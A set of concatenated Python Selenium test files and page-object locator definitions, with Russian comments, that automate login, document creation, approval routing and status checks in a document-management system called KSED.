butAct = WebElement(xpath=KSEDLocators.butAct) # Кнопка "Действия с выбранными"
butAct_2 = WebElement(xpath=KSEDLocators.butAct_2) # Кнопка "Действия с выбранными"
butExp = WebElement(xpath=KSEDLocators.butExp) # Кнопка экспорта
butExp_2 = WebElement(xpath=KSEDLocators.butExp_2) # Кнопка экспорта
checkBoxFirst = WebElement(xpath=KSEDLocators.checkBoxFirst) # Первый чекбокс в списке
butFavorite = WebElement(xpath=KSEDLocators.butFavorite) # Кнопка добавить в избранное
butOK = WebElement(xpath=KSEDLocators.butOK) #Кнопка OK добавить в избранное
butSelExp = WebElement(xpath=KSEDLocators.butSelExp) # Кнопка экспорта выбранного
# Карточка согласования
kurator = WebElement(xpath=KSEDLocators.kurator) # куратов
viewSelecton = WebElement(xpath=KSEDLocators.viewSelecton) # вид документа
viewLndSelecton = WebElement(xpath=KSEDLocators.viewLndSelecton) # вид ЛНД
etcSelecton = WebElement(xpath=KSEDLocators.etcSelecton) # вид документа Прочие
rdSelecton = WebElement(xpath=KSEDLocators.rdSelecton) # вид документа РД
lndSelecton = WebElement(xpath=KSEDLocators.lndSelecton) # вид документа ЛНД
btnSelection4 = WebElement(xpath=KSEDLocators.btnSelection4) # 4 выбор
titleCS = WebElement(xpath=KSEDLocators.titleCS) # заголовок
saveProject = WebElement(xpath=KSEDLocators.saveProject) # сохранить проект
proUpLevel = WebElement(xpath=KSEDLocators.proUpLevel) # процесс
levelFirst = WebElement(xpath=KSEDLocators.levelFirst) # 1 уровень
levelFirst_1 = WebElement(xpath=KSEDLocators.levelFirst_1) # поле ввода 1 уровень
navedenieSogl = WebElement(xpath=KSEDLocators.navedenieSogl) # локатор для наведения на созданный этап согласования
btnAddPerson = WebElement(xpath=KSEDLocators.btnAddPerson) # кнопка добавления сотрудника к этапу согласования
btnAddPerson_2 = WebElement(xpath=KSEDLocators.btnAddPerson_2) # кнопка добавления сотрудника к этапу согласования
createRuleTypical = WebElement(xpath=KSEDLocators.createRuleTypical) # кнопка типового маршрута
btnContinium = WebElement(xpath=KSEDLocators.btnContinium) # кнопка продолжить
reserchInput = WebElement(xpath=KSEDLocators.reserchInput) # строка поиска
zamechSogl = WebElement(xpath=KSEDLocators.zamechSogl) # статус согласования
statusSogl = WebElement(xpath=KSEDLocators.statusSogl) # статус согласования
statusSogl_2 = WebElement(xpath=KSEDLocators.statusSogl_2) # cтатус согласования
rejectSogl = WebElement(xpath=KSEDLocators.rejectSogl) # кнопка отозвать с согласования
reasonReject = WebElement(xpath=KSEDLocators.reasonReject) # причина отказа / отзыва
btnAction = WebElement(xpath=KSEDLocators.btnAction) # пкнопка действия
downLoadNewVersion = WebElement(xpath=KSEDLocators.downLoadNewVersion) # загрузить новую версию
bntVersion = WebElement(xpath=KSEDLocators.bntVersion) # кнопка версия
btnInApp = WebElement(xpath=KSEDLocators.btnInApp) # кнопка внутреннего согласования
btnInApp_2 = WebElement(xpath=KSEDLocators.btnInApp_2) # кнопка внутреннего согласования
employeeForSogl = WebElement(xpath=KSEDLocators.employeeForSogl) # поле сотрудники
btnRejectInnerSogl = WebElement(xpath=KSEDLocators.btnRejectInnerSogl) # кнопка отзыва внутреннего согласования
statusInner = WebElement(xpath=KSEDLocators.statusInner) # статус внутреннего согласования
statusInner_2 = WebElement(xpath=KSEDLocators.statusInner_2) # статус внутреннего согласования
statusInner_3 = WebElement(xpath=KSEDLocators.statusInner_3) # статус внутреннего согласования
statusInner_4 = WebElement(xpath=KSEDLocators.statusInner_4) # статус внутреннего согласования
navedTaskInnerSogl = WebElement(xpath=KSEDLocators.navedTaskInnerSogl) # для наведения на задачу согласования внутреннего
btnRjctTaskInnerApp = WebElement(xpath=KSEDLocators.btnRjctTaskInnerApp) # кнопка отозвать задачу согласования внутреннего
btnAddAtt = WebElement(xpath=KSEDLocators.btnAddAtt) # кнопка добавить вложение
bntDocForRassmotr = WebElement(xpath=KSEDLocators.bntDocForRassmotr) # кнопка добавить вложение для рассморения
elmDownloaded = WebElement(xpath=KSEDLocators.elmDownloaded) # добавленное вложение
btnAddComment = WebElement(xpath=KSEDLocators.btnAddComment) # кнопка добавления замечаний
areaComment = WebElement(xpath=KSEDLocators.areaComment) # замечания
checkComment = WebElement(xpath=KSEDLocators.checkComment) # проверка комментариев
returnDecision = WebElement(xpath=KSEDLocators.returnDecision) # кнопка отзыв решен
softDecision = WebElement(xpath=KSEDLocators.softDecision) # кнопка смягчитьрешение
takeTasks = WebElement(xpath=KSEDLocators.takeTasks) # кнопка забрать задачу
backTasks = WebElement(xpath=KSEDLocators.backTasks) # кнопка вернуть задачу
infoMassage = WebElement(xpath=KSEDLocators.infoMassage) # информационное сообщение
butDelComment = WebElement(xpath=KSEDLocators.butDelComment) # кнопка удаления комментариев
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocVH(MPages, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
# self.get(dataTest.baseURL)
#
# wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
# page = Locator(self.w)
self.username_text = username
self.password_text = password
self.LogIn_button.click()
# wait_page_loaded(self._web_driver)
self.user_menu.wait_to_be_clickable()
assert "АРМ" in self._web_driver.title
# Создание документа (открытие формы создания и заполнение атрибутов)
def Creat(self,):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
# page = Locator(self.w)
# wait = WebDriverWait(self.w, 10)
self.newDoc_button.click()
self.vhDoc.click()
assert "Страница создания документа" in self._web_driver.title
# time.sleep(1)
# Атрибуты документа
# Адресат
self.adresat.scroll_to_element()
self.adresat.wait_to_be_clickable()
self.adresat.send_keys(u'Строганов' + Keys.RETURN)
# Корреспондент
self.korrespondent.wait_to_be_clickable()
self.korrespondent.send_keys(u'Логика' + Keys.RETURN)
# Категория документа
self.category_doc.wait_to_be_clickable()
self.category_doc.send_keys(u'Открытый' + Keys.RETURN)
# Исходящий номер
self.ishNumber.send_keys(u'123456')
# Дата исходящего
dd = datetime.date.today().strftime('%d%m%Y')
self.dateIS.send_keys(dd)
# Кнопка "Создать"
self.btnCreateDoc.scroll_to_element()
self.btnCreateDoc.wait_to_be_clickable()
self.btnCreateDoc.click()
# wait.until(EC.number_of_windows_to_be(2))
wait_page_loaded(self._web_driver)
# self.w.set_page_load_timeout(30)
# time.sleep(20)
#
# wait.until(EC.title_is(self.w.title))
self.mode.wait_to_be_clickable()
assert "Документ" in self._web_driver.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocPVH(Locator, dataTest):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
self.get(dataTest.baseURL)
wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
page.username_text = username
print(Locator.username_text)
page.password_text = password
page.LogIn_button.click()
wait_page_loaded(self.w)
assert "АРМ" in self.w.title
# Создание документа (открытие формы создания и заполнение атрибутов)
def Creat(self,):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
page.newDoc_button.click()
page.paket_vh.click()
assert "Страница создания документа" in self.w.title
time.sleep(1)
# Атрибуты документа
# Корреспондент
self.w.execute_script("arguments[0].scrollIntoView();", page.korrespondent)
page.korrespondent.send_keys(u'Сибинтек' + Keys.RETURN)
page.korrespondent.send_keys(Keys.RETURN)
# Способ доставки
page.sposob_dost.send_keys(u'КСЭД' + Keys.RETURN)
# Адресат
page.adresat.send_keys(u'Строганов'+ Keys.RETURN)
time.sleep(0.5)
# Кнопка "Создать"
self.w.execute_script("arguments[0].scrollIntoView();", page.btnCreateDoc)
wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.btnCreateDoc)))
page.btnCreateDoc.click()
# wait.until(EC.number_of_windows_to_be(2))
wait_page_loaded(self.w)
# self.w.set_page_load_timeout(30)
time.sleep(2)
#
# wait.until(EC.title_is(self.w.title))
assert "Документ" in self.w.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocPor(MPages, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
# self.get(dataTest.baseURL)
# wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
#**page = Locator(self.w)
#page = MPages(self.w, self.w.current_url)
self.username_text = username
# print(Locator.username_text)
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title
# Создание документа (открытие формы создания и заполнение атрибутов)
def Creat(self,):
#**page = Locator(self.w)
#page = MPages(self.w, self.w.current_url)
wait = WebDriverWait(self._web_driver, 10)
self.newDoc_button.click()
self.poruchenie.click()
self.wait_page_loaded()
#**wait_page_loaded(self.w)
assert "Страница создания документа" in self._web_driver.title
# Атрибуты документа
self.wait_page_loaded()
#**wait_page_loaded(self.w)
# Тип поручения
wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.tipPoruch)))
self.tipPoruch.wait_until_not_visible()
self.tipPoruch.scroll_to_element()
self.tipPoruch.send_keys(u'Для информации' + Keys.ENTER)
# Категория документа
self.category_doc.wait_until_not_visible()
self.category_doc.send_keys(u'Открытый' + Keys.RETURN)
# Ответственный исполнитель
self.otvetstv_ispoln.scroll_to_element()
self.otvetstv_ispoln.send_keys(u'Строганов' + Keys.RETURN)
# Кнопка "Создать"
self.btnCreateDoc.scroll_to_element()
self.btnCreateDoc.wait_to_be_clickable()
self.btnCreateDoc.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
#**wait_page_loaded(self.w)
self.wait_page_loaded()
assert "Документ" in self._web_driver.title
# Сохраним ссылку на документ в файл
def LinkDocWFile(self):
url = self._web_driver.current_url
my_file = open("Tests/linkDocPoruchenie.txt", "w")
my_file.write(str(url))
my_file.close()
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocReestr(Locator, dataTest, KSEDLocators, MPages):
def __init__(self, web_driver, uri = dataTest.baseURL):
super().__init__(web_driver, uri)
# self.get(dataTest.baseURL)
#
# wait_page_loaded(self._web_driver)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
# page = Locator(self.w)
self.username_text = username
print(Locator.username_text)
self.password_text = password
self.LogIn_button.click()
wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title
# Создание документа (открытие формы создания и заполнение атрибутов)
def Creat(self,):
wait = WebDriverWait(self._web_driver, 10, poll_frequency=1,
ignored_exceptions=[NoSuchElementException,
ElementNotVisibleException,
ElementNotSelectableException])
actions = ActionChains(self._web_driver)
# self = Locator(self._web_driver)
wait = WebDriverWait(self._web_driver, 10)
self.newDoc_button.click()
self.reestr.click()
assert "Страница создания документа" in self._web_driver.title
# time.sleep(1)
# Атрибуты документа
# Вид реестра
self.vid_reestra.click()
self.vid_reestraPP.click()
time.sleep(0.5)
# Получатель
self.poluchatel.send_keys("Сибинтек"+Keys.RETURN)
wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.poluchatel)))
# Документы
self.inpDoc.wait_to_be_clicable()
self.inpDoc.send_keys(dataTest.BARCODE+Keys.RETURN)
time.sleep(0.5)
# Кнопка "Создать и отправить"
wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.btnCreateSend)))
actions.move_to_element(self.btnCreateSend).click().perform()
#self.btnCreateSend.click()
# wait.until(EC.number_of_windows_to_be(2))
wait_page_loaded(self._web_driver)
# self._web_driver.set_page_load_timeout(30)
time.sleep(2)
#
# wait.until(EC.title_is(self._web_driver.title))
assert "Документ" in self._web_driver.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver import ActionChains
from page_objects import PageObject
from page_objects import PageElement
from page_objects import MultiPageElement
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select, WebDriverWait
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDsubordinate_doc(Locator, dataTest,KSEDLocators):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
self.get(dataTest.baseURL)
wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
page.username_text = username
print(Locator.username_text)
page.password_text = password
page.LogIn_button.click()
#page.wait(2)
# Ожидание
# select = Select(Locator.username_text)
# select.select_by_visible_text("текст")
wait_page_loaded(self.w)
assert "АРМ" in self.w.title
# r = page.username_text.locator
#r = "123456"
# my_file = open("temp.txt", "w")
# my_file.write(str(r))
# my_file.close()
#t = page.username_text.locator
def subordinate_doc(self):
wait = WebDriverWait(self.w, 1, poll_frequency=1,
ignored_exceptions=[NoSuchElementException,
ElementNotVisibleException,
ElementNotSelectableException])
actions = ActionChains(self.w)
page = Locator(self.w)
self.w.execute_script("arguments[0].scrollIntoView();", page.expedition)
page.expedition.click()
time.sleep(0.5)
actions.move_to_element(page.expedition).move_by_offset(0, 10).click().perform()
# d = len(page.subordinate)
# print(str(d))
time.sleep(1)
#Так тоже можно
# for element in page.subordinate:
#
# self.w.execute_script("arguments[0].scrollIntoView();", element)
# element.click()
# if page.oneSubordInList:
# page.oneSubordInList.click()
#
# break
for element in page.subordinate:
self.w.execute_script("arguments[0].scrollIntoView();", element)
element.click()
self.w.execute_script("arguments[0].scrollIntoView();", page.oneSubordInList)
page.oneSubordInList.click()
wait_page_loaded(self.w)
assert "Документ" in self.w.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDnaprSZSoglas(Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
self.get(dataTest.baseURL)
wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
page.username_text = username
print(Locator.username_text)
page.password_text = password
page.LogIn_button.click()
wait_page_loaded(self.w)
assert "АРМ" in self.w.title
# Открытие документа из прошлого ТК
def getDoc(self):
my_file = open("Tests/linkDocSZ.txt", "r")
my_string = my_file.read()
my_string.strip()
self.w.get(my_string)
my_file.close()
#self.w.get(KSEDLocators.LinkDoc)
wait_page_loaded(self.w)
# Добавление вложения
def attachment(self,):
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
actions = ActionChains(self.w)
actions.move_to_element(page.vlozheniya).perform()
time.sleep(0.5)
page.attachments.click()
time.sleep(0.5)
page.show_list.click()
# wait.until(EC.element_to_be_clickable((By.XPATH, '//div[contains(@id, "default-dialog")]')))
time.sleep(0.5)
#wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.fileUpload)))
page.fileUpload.click()
time.sleep(0.5)
#wait.until(EC.presence_of_element_located((By.XPATH, KSEDLocators.files)))
# wait.until(EC.element_to_be_clickable((By.XPATH, '//div[contains(@id, "default-dialog")]')))
page.files.send_keys('C:\\test.txt')
# # Добавление пункта "Поручение"
# def addPoruchenie(self, ):
# page = Locator(self.w)
#
# wait = WebDriverWait(self.w, 10)
#
# time.sleep(1)
# page.show.click()
#
# WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.punkti)))
# page.punkti.click()
#
# WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.punktiBtn)))
# page.punktiBtn.click()
#
# page.punktPoruch.click()
#
# page.textPoruch.send_keys("Произвольный текст")
#
# page.tipPoruch.send_keys("Поручение по пункту РД" + Keys.RETURN)
#
# page.otvetstv_ispolnVpunktah.send_keys("Главный" + Keys.RETURN)
#
# dd = datetime.date.today().strftime('%d%m%Y')
# page.srokIspoln.send_keys(dd)
#
# page.btnOKform.click()
# Создание маршрута согласования
def creation_of_the_approval_route(self):
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
time.sleep(1)
# "Показать общую карточку" клик
page.show.click()
# "Согласование" вкладка
WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.soglasovanieWkladka)))
page.soglasovanieWkladka.click()
# "Создать маршрут" клик по кнопке
WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.createRuleBtn)))
page.createRuleBtn.click()
# Выберем "Индивидуальный маршрут"
page.createRuleIndivid.click()
# Появилась форма "Редактирование маршрута" нажмем "ОК"
WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.btnOKform)))
page.btnOKform.click()
# Нажмем кнопку "Добавить этап"
WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.addEtap)))
page.addEtap.click()
time.sleep(1.5)
# Заполним "Вид этапа"
page.tipeEtap.send_keys("Согласование"+ Keys.ENTER)
time.sleep(0.5)
page.tipeEtap.send_keys(Keys.ENTER)
time.sleep(1)
# Заполним "Согласующие"
page.soglasuychie.send_keys("Яцкин" + Keys.ENTER)
# Нажмем кнопку "ОК" на форме
time.sleep(0.5)
page.btnOKformSogl.click()
wait_page_loaded(self.w)
# Направление на согласование и проверка статуса документа
def NapSoglasovanie(self, ):
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
time.sleep(1)
page.sendFor_approval.click()
wait_page_loaded(self.w)
# Проверим статус документа
wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.osnSvedeniya)))
page.osnSvedeniya.click()
assert "На согласовании" in self.status_Doc.text
# # Сохраним ссылку на документ в файл
# def LinkDocWFile(self):
#
# url = self.w.current_url
# my_file = open("TestData\linkDoc.txt", "w")
# my_file.write(str(url))
# my_file.close()
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver import ActionChains
from page_objects import PageObject
from page_objects import PageElement
from page_objects import MultiPageElement
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDAbsence(Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
self.get(dataTest.baseURL)
wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
page.username_text = username
print(Locator.username_text)
page.password_text = password
page.LogIn_button.click()
wait_page_loaded(self.w)
assert "АРМ" in self.w.title
# Перейдем на страницу Логика ECM.Мой профиль
def getLogicESM(self, ):
page = Locator(self.w)
page.user_menu.click()
page.logic_ESM.click()
wait_page_loaded(self.w)
assert "Логика ECM.Мой профиль" in self.w.title
def Absence(self):
wait = WebDriverWait(self.w, 10, poll_frequency=1,
ignored_exceptions=[NoSuchElementException,
ElementNotVisibleException,
ElementNotSelectableException])
page = Locator(self.w)
page.autoAnswerText.clear()
page.autoAnswerText.send_keys('Навстречу злоключениям...')
page.btnCreateDoc.click()
wait_page_loaded(self.w)
assert "Логика ECM.Мой профиль" in self.w.title
assert wait.until(EC.visibility_of_element_located((By.XPATH, KSEDLocators.btnCancelAbsence)))
# Отменим отсутствие
page.btnCancelAbsence.click()
page.btnYes.click()
wait_page_loaded(self.w)
assert wait.until(EC.visibility_of_element_located((By.XPATH, KSEDLocators.btnCreateDoc)))
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDexpZap(MPages, Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri = dataTest.baseURL):
super().__init__(web_driver, uri)
# self.get(dataTest.baseURL)
# wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title
self.wait_page_loaded()
self.mySearch.move_to_element() # Перейти в строку отчеты
self.mySearch.wait_to_be_clickable()
self.mySearch.click()
self.btnPlus.wait_to_be_clickable() # развернуть на "+"
self.btnPlus.click()
self.zaprosToDel.wait_to_be_clickable() # выбрать созданный по предусловию запрос
self.zaprosToDel.click() # выбрать созданный по предусловию запрос
self.checkBoxFirst.wait_to_be_clickable() # выбрать созданный по предусловию запрос
self.checkBoxFirst.click() #Первый чекбокс в списке
self.butAct.wait_to_be_clickable() #Кнопка действия с выбором
self.butAct.click() # Первый чекбокс в списке
self.butFavorite.wait_to_be_clickable()
self.butFavorite.click() #Кнопка добавить в избранное
self.butOK.wait_to_be_clickable()
self.butOK.click() # Кнопка действия с выбором
assert self.oblProsm.is_displayed() # Проверка, что отображается рабочая область
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocPorSoglas(MPages, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title or "Документ" in self._web_driver.title
# Открытие документа из прошлого ТК
def getDoc(self):
my_file = open("Tests/linkDocPoruchenie.txt", "r")
my_string = my_file.read()
my_string.strip()
self._web_driver.get(my_string)
my_file.close()
self.wait_page_loaded()
def Soglasovanie(self, ):
self.APPROVED_button.wait_to_be_clickable()
self.APPROVED_button.click()
# self.prop_bpm_comment.wait_until_not_visible()
# self.prop_bpm_comment.send_keys('я так хотю')
self.apply_button_button2.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
self.wait_page_loaded()
# открыть согласование вкладку
self.soglasovanieWkladka2.wait_to_be_clickable()
self.soglasovanieWkladka2.click()
# выпадающий список согласований
self.dropBtn.wait_to_be_clickable()
self.dropBtn.click()
self.status_Doc.wait_until_not_visible()
assert "Согласовано" in self.resultSogl.get_text()
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocPorDorab(MPages, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title or "Документ" in self._web_driver.title
# Открытие документа из прошлого ТК
def getDoc(self):
my_file = open("Tests/linkDocPoruchenie.txt", "r")
my_string = my_file.read()
my_string.strip()
self._web_driver.get(my_string)
my_file.close()
self.wait_page_loaded()
# Отклонить согласование и вернуть на доработку
def REJECTED(self,):
self.REJECTED_button.wait_to_be_clickable()
self.REJECTED_button.click()
self.prop_bpm_comment.wait_until_not_visible()
self.prop_bpm_comment.send_keys('Отклонено')
self.apply_button_button.wait_to_be_clickable()
self.apply_button_button.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
self.wait_page_loaded()
# # Проверим статус документа
# self.osnSvedeniya.wait_to_be_clickable()
# self.osnSvedeniya.click()
#
# self.status_Doc.wait_until_not_visible()
# assert "На доработке проекта" in self.status_Doc.text
# открыть согласование вкладку
self.soglasovanieWkladka2.wait_to_be_clickable()
self.soglasovanieWkladka2.click()
# выпадающий список согласований
self.dropBtn.wait_to_be_clickable()
self.dropBtn.click()
self.status_Doc.wait_until_not_visible()
assert "Отклонено" in self.resultSogl.get_text()
# # Направление на согласование и проверка статуса документа
# def NapSoglasovanie(self, ):
#
# self.sendFor_approval.wait_to_be_clickable()
# self.sendFor_approval.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
#
# self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
# self.wait_page_loaded()
#
# # Проверим статус документа
# self.osnSvedeniya.wait_to_be_clickable()
# self.osnSvedeniya.click()
#
# self.status_Doc.wait_until_not_visible()
# assert "На согласовании" in self.status_Doc.text
#
# # Выйдем из системы
# def USER_LOGOUTs(self,):
#
# self.user_menu.wait_to_be_clickable()
# self.user_menu.click()
#
# self.USER_LOGOUT.wait_to_be_clickable()
# self.USER_LOGOUT.click()
#
# self.wait_page_loaded()
#
# assert "Войти" in self.w.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
